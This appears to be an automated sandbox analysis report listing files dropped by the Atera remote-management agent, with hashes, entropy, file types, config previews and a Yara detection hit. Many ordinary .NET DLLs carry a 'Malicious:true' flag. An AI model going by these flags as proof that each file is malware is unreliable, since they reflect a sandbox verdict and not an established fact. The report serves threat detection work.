                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.134206560185113
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:3jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvO:3+e55LgIkTmyAAfTnMLvO
                                                                                                                                                                                                                                                                                              MD5:F391CCB7426246CEF39937C6C85FFCF5
                                                                                                                                                                                                                                                                                              SHA1:925186A6A3F52512E3547EFB94AF3CE8C8A19F9F
                                                                                                                                                                                                                                                                                              SHA-256:506D6F045E379C944291C4D42877AC80D767FE761DB878C60D4907862395509D
                                                                                                                                                                                                                                                                                              SHA-512:CB86079DF5D791C1900466B079BEF0614B873C3617B85A02C32E4C052ABFF0C7B87429BA5062F8FBF878ACDB4E9D74B69516DB2C4628677DF05D109624DCE99D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960602645180309
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:mBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:mBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                                                                              MD5:FCA140489085D8088D8A3BBC0EADF117
                                                                                                                                                                                                                                                                                              SHA1:2EB49B4E7253D242EB7C2581453B11DCE83848FA
                                                                                                                                                                                                                                                                                              SHA-256:89DF8434C10815C95DEC04BA45F9E7AA07DA3AE3B01227069F28F503DB8A6ABB
                                                                                                                                                                                                                                                                                              SHA-512:F38226E0B6222F5FFA37C1DDFF42364574E50D7B2324AD11931E6A38A679E2AE7930C5B373CCB179AD36F229620DDDF9A1E20E4CF27FC2185698DC1B49F2BD07
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18472
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7042894099808645
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:OqfstMuZM62t0Nyb8E9VF6IYijSJIVxxCRFa8:OnMu66e0EpYi60EX
                                                                                                                                                                                                                                                                                              MD5:3F901D04C4F0639CD2A8EB0658934363
                                                                                                                                                                                                                                                                                              SHA1:020C122AC62E2D8DAED6F6E3F565AD95020DC7C9
                                                                                                                                                                                                                                                                                              SHA-256:8D3EA5FECD13346F6CF7C1DD22A9A4ACEAB933237315F2CDB3E3336D203415F6
                                                                                                                                                                                                                                                                                              SHA-512:DC5A4A8C7DBE10CA75A859CE252EBA04949E41990CEBA19981ADAC781009A666B83AB71C9A093812CE23BC3FA24405494C5F60C837C20E91268B28F2982464F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):975
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.005145470654642
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdsHPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3st7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:DB02B24A7803C99F651940FECBE6E283
                                                                                                                                                                                                                                                                                              SHA1:34EF3032B61E369535658D72BCE1E9908888EA0A
                                                                                                                                                                                                                                                                                              SHA-256:207C4D442FACD06379217DD915D85D926DD622E72F6DB5814753FD2E5F8D0048
                                                                                                                                                                                                                                                                                              SHA-512:9C76B6E3DBB34E2729F5C0E49A2A195C87AE11916A4479676AD09EE2C182DD83F87E826BA39DDF410B99A82EF1053571AA7A1E97426D396794C6E25E066C3849
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.67419471304358
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Ky/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOq5eFQ:KuhMaVmzDC6k0EpYi60GFQ
                                                                                                                                                                                                                                                                                              MD5:8802D420754BF1D2D0375E7616A8C0E7
                                                                                                                                                                                                                                                                                              SHA1:A6F98EE725ACD9143BB2513EEBC7D21BE055B6D3
                                                                                                                                                                                                                                                                                              SHA-256:F9084AEDB6F80B41B1018F1983A746DC15AC290B5BF7D3096F68716049485997
                                                                                                                                                                                                                                                                                              SHA-512:7627A626774ADCCEAF0461815AB8987C74DDFBACA401C734BE886DB8D8C9EA7FF9F1CE4CB50F1AF331C9B81823063EEF36C789B41583B7C60A1A5D05F90AC9A2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.266246479247275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:mYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zr1C:mKC9niwOepJ6TJPeb6NIUFg76Kzrc
                                                                                                                                                                                                                                                                                              MD5:9057AF1C1137747ED13F9F1D1A60D3F8
                                                                                                                                                                                                                                                                                              SHA1:6CAA9C3E940D3C5B8E0712ED5BD6A808FD7A1972
                                                                                                                                                                                                                                                                                              SHA-256:FBF397A93F036A5A6BCFD5E9A0284CF0176BD14DE64E4112F62B9907EBB7A275
                                                                                                                                                                                                                                                                                              SHA-512:45C09D503CF659063331BBFCB584BAA3145BD15853AA4D6D796869EC6C26EA9F3DE41FD93C95770421F7DD3B080B6DABA0BB461D5A591DEB59CCD4FF27CE6E1B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178878143933301
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:NP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHf:Nh0qjC5RMOHO420kN1U
                                                                                                                                                                                                                                                                                              MD5:22F621864F912999153ABBB388FA2201
                                                                                                                                                                                                                                                                                              SHA1:B8DD279077A56F232B88E760E86EAB6E1643A27A
                                                                                                                                                                                                                                                                                              SHA-256:F37138000A2A7B659746C2F1B5B04662EA3C6F3BBB99D8431E501E7C1A48B6B2
                                                                                                                                                                                                                                                                                              SHA-512:A9A961EF94204D86A7F1DFF09F27647D205DEE0F66F6ABAA3BA24FE433A43577294D985F26A605D8D71A898BDE0EA2B7D2D9BA6904505D8E0DCE0E8A043D5343
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6358275792286925
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:6TO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08II:6Cn6xYEpYi60k8J
                                                                                                                                                                                                                                                                                              MD5:EE85382C1837ED5F63F224AA54F55114
                                                                                                                                                                                                                                                                                              SHA1:021EF0F6D8AA0B7E6220AABEA662CCF552D28255
                                                                                                                                                                                                                                                                                              SHA-256:780A4CC22F54F6363E140A85A209348123CC95E50459EBCFFAC94658728D40A3
                                                                                                                                                                                                                                                                                              SHA-512:B7EA109B76D80F4E811DAE61259F50064F5240FFE47EEBD40D0F7FDAAB9292C5003CD6EE5916EE11B444B78CF3F8A3707AEEAA4A8B86B61C8A56DEAC53E649D9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332263296888565
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+yWEpYi6018:QnvXYcIh6yFIFBYpcyX76T
                                                                                                                                                                                                                                                                                              MD5:CA05B735DDFC8455DE0DCEB9F0D61AA0
                                                                                                                                                                                                                                                                                              SHA1:1CFF8FA91F93C9AFED0DE4A3755C294F2EF73E30
                                                                                                                                                                                                                                                                                              SHA-256:B639135A02AADB17FE574E926958DDCADEDB7D6AB1AE6B6A922A019D5E90DAE2
                                                                                                                                                                                                                                                                                              SHA-512:85D9DA312F667633AB86508D0CBE08537B9FB933D823532B0F610C05316BD92510DB63CC48153A7E4B419C00AAB7158B4D0BDD887A1E4C366FCE7D9C0E966977
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3264840
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999888526840204
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:98304:tXocgF/bGeL2rNCmtrWUw5WjYtwmiwzYi:tdC/SSg9zjYtwhwl
                                                                                                                                                                                                                                                                                              MD5:8E70AF11D0EE2ABE139B40D67E70B73C
                                                                                                                                                                                                                                                                                              SHA1:18582E88E16255D5D267904BDF0357EC9FF333E0
                                                                                                                                                                                                                                                                                              SHA-256:5C687ADAA48B83DE220E8489E0CEB0093BE1F94260750C8D94A1B8497781327E
                                                                                                                                                                                                                                                                                              SHA-512:3A845ED4AB368B0DDE7E98D77FB796E9070F6BB9472EA833E52B19EB5BD47260E0B288FD3C8D19235BD9DED6F7B11EA10985AD871C8F5C82751249301D3EE4A6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33320
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.272339196658384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:a2G6bukIMKWcoIQEIhL4lylU9OfWtkfoi75yHiDMMXpO66REVmlRSNyb8E9VF6I+:PLKF6EIR4lXsIEDLseVmlRyEpYi60+D1
                                                                                                                                                                                                                                                                                              MD5:2EC1D28706B9713026E8C6814E231D7C
                                                                                                                                                                                                                                                                                              SHA1:7EF12A01182D28A5EBF049CC1CB80619CD1E391A
                                                                                                                                                                                                                                                                                              SHA-256:C9514BF67DF87AC6CC1002F3585D5B6F7D4093A7A794D524FA8C635F052733DE
                                                                                                                                                                                                                                                                                              SHA-512:9E23588DC6D721F42E309974C3F3089F845F10D1DEE87FB26213BA3810EE3C272D758632CF1C9157F6862BA0E582AFC49C1EE51540461F41840650F216F35AEB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1537
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0063120500114895
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FV0PH2/+w3VUrPH2/+789y:3sIk7O7RgdjdgFSagFsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:C3CA0AD8FE91D02044029A11A9480B1F
                                                                                                                                                                                                                                                                                              SHA1:1FB4C1063460C48AC77D3D4702697A35727A5E51
                                                                                                                                                                                                                                                                                              SHA-256:B2AED8BAB56D0FDBD1D6F1277A3257DFFBFD107BEB19320C0D1F4DC0E4AD3AEF
                                                                                                                                                                                                                                                                                              SHA-512:50B18B6DD91CB691C8B77AB612A7172CE59881705A52F59880A29A0F81E910A61D3D4506AB53B1F945611AFE079B96A896F3F01442D3B68801B2748C68AE01F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWA:Wp
                                                                                                                                                                                                                                                                                              MD5:9A5E9A329E4E73E0C499371205A810DB
                                                                                                                                                                                                                                                                                              SHA1:5B6D85657D4ACD89867283FBE372E9E85C30686F
                                                                                                                                                                                                                                                                                              SHA-256:D109087C4CA318CAD74B7560C32594D37181885ADBDC9348BA1DD35D47B35B92
                                                                                                                                                                                                                                                                                              SHA-512:02BD5261B9E795ED5A07BADD65A6CF71D18751452FB44BDD424DFCC6C50BA7441E0066B125E731018FD6F1A8A002AC4E6961C7EFF21C36FBDA58C8015A100C43
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=30.3
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):112168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.180159202167914
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:BgssVbDRgWchiMWXRIe0ZMTR8U3XTknAxb2waOn3ybQgLbYpm8GRUdokEWUpj76y:BUpviy8UHTRxrybQgLbGm8FUpjR
                                                                                                                                                                                                                                                                                              MD5:5114EBB60AC0416A62499F4CB632FC87
                                                                                                                                                                                                                                                                                              SHA1:2E38B97A6A1EA9B36F64339DD7FC3C58083ABAA6
                                                                                                                                                                                                                                                                                              SHA-256:CC93928F16DADCDAB232332825BB744CD1E6AEC55E59EA14977AEF413EACD0FD
                                                                                                                                                                                                                                                                                              SHA-512:07E673BA52EE82C59E6C3FFC9CF95F39BBFB7903E449A9AA49893879A94A61BB9296D653631DF5FEEB1EB9787512C6008901054C5A2509EDD7132F9477309942
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2032780562233345
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhj:X9XeDmzV2yzlhKLFU1lLVp1+2flYFnQi
                                                                                                                                                                                                                                                                                              MD5:4423EF97B513D7BA0D2EEB1FCA4D28E2
                                                                                                                                                                                                                                                                                              SHA1:7BD205977CBA7A6C21C89C5C9FEAA010B9C9298D
                                                                                                                                                                                                                                                                                              SHA-256:EEC63220063690D7D953A1FB8F3798AE7D277A36482AD4EB804D526A7FE7C71A
                                                                                                                                                                                                                                                                                              SHA-512:316C3C0478FC11FE7C94A31F895E7084FAD4F7C9ED08E19DD30536038FFA80C2B7AF769AFC9C51A2EABDBADA71912BC685E62FFB1123207663F9079BA4D96BFE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38952
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.310169343696597
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:eINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgVK:XNsii6v/HS0+OJd5gpKm76tgI
                                                                                                                                                                                                                                                                                              MD5:FC2E2EB6AA0EB01DEB3D5DDE95216C5D
                                                                                                                                                                                                                                                                                              SHA1:11DAAA7ED638922C8CF473A4FF3BA56224510BFE
                                                                                                                                                                                                                                                                                              SHA-256:862AA98B7C3A28A5B8377BA18BAB84D1D8D289A2EE5ACEB56DE43176CCDEF1C8
                                                                                                                                                                                                                                                                                              SHA-512:A1216C57AE85612F2A48FB7988B61B449343963EF273B26CAE74D1AB18790872961A8AC2EDCA389B00C5C85B82B645F218F784F98F4F6125E6D3B7E00B7E45B1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29224
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.670756678192546
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:3mYaXzmSJL6guJrdvc5tIZmQCaBj4QU3hOTVTDvAGvoOCcdcOFyF606Nyb8E9VFL:1SJh5tIYQzT5zyF60aEpYi60uc
                                                                                                                                                                                                                                                                                              MD5:54A2B1EC2667987A308A52DEDF33C0D5
                                                                                                                                                                                                                                                                                              SHA1:556461805105DCB765B7DC5D0E110B82908226DB
                                                                                                                                                                                                                                                                                              SHA-256:1C9A08BC7802BD9F2486B4C967DF27729AE8805B0B6664A257C951ACA199B04D
                                                                                                                                                                                                                                                                                              SHA-512:28A478AC767843924D4B90D42F3A40F033971CE0EDEC7D94BDB86C2659B8605051983C7F9B8223961D1866364F78DDACB6D613F09BF8ECFC1A209D3515FCE264
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):219176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.062824781472667
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:nYq80gPJle2CpcKyudA1+PVtMG8e7sw9CcHvhlt:nYqqbe2CSod5dtM8ww7PB
                                                                                                                                                                                                                                                                                              MD5:9D744C31089704B1130E09E63B0A77EF
                                                                                                                                                                                                                                                                                              SHA1:5EFBE59068AD3C09B29565F5A117347F5B85D0EA
                                                                                                                                                                                                                                                                                              SHA-256:D9B9EFAF5C6B1D3EB726EEE5B6FE1517B4693C4E79BD9D36D3D9FB4F56E01E1D
                                                                                                                                                                                                                                                                                              SHA-512:E4456196C56B43ABA2A804694B6177A6EB78D035BD1AD9A0163BCFDDD6FCF75C34AF08C849A8086B78347141C798A050FD33BD02CFAA1BCF679ECB928737D3A4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):302120
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.175844791268153
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:9tDIk5C5mx115y505H0jIfJMSFk9X0jIfJMSFk9y:fGwJMykwwJMyky
                                                                                                                                                                                                                                                                                              MD5:24E35FC5F23B651ED4C828208990F6B8
                                                                                                                                                                                                                                                                                              SHA1:F7E295866E30105C0E9071B00A77EEC79F60B699
                                                                                                                                                                                                                                                                                              SHA-256:CA054D78E0B23D9EE4C0E42C8F12AE9065D3D0DB4FBD5A535CA2E61FE8FF7D93
                                                                                                                                                                                                                                                                                              SHA-512:E5F8905116BFFDDC60ADE11ABA3733F52BE6FAEA7C1AA57361BC9A395D770D478A1D90D729A94A39171F7D8EF5CF25F45EDF70470A3ECD6AF8C0DC27F1AE3078
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):432
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0141792226861375
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGzNFF7ap+5v5OXrRf/2//FicYo4xT:JduPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:8F6EB9E75E6A6F0C0D58FB697C10CEDF
                                                                                                                                                                                                                                                                                              SHA1:6944935DFDC33E0C6DB26869BF25EDA85A2622D8
                                                                                                                                                                                                                                                                                              SHA-256:E2B8677434501735FB0233ED0CC2FFEE5BF6FB4387C51DBCB2585A70E42E4F08
                                                                                                                                                                                                                                                                                              SHA-512:A946252B2E3705EAE751A2672D4ADE1499ECEB28C48B4BE6150C4201EE20A7B9A4450C75E06B07F5DAA3528041A566931D988FBD0C2EA90240D61008895BA44A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
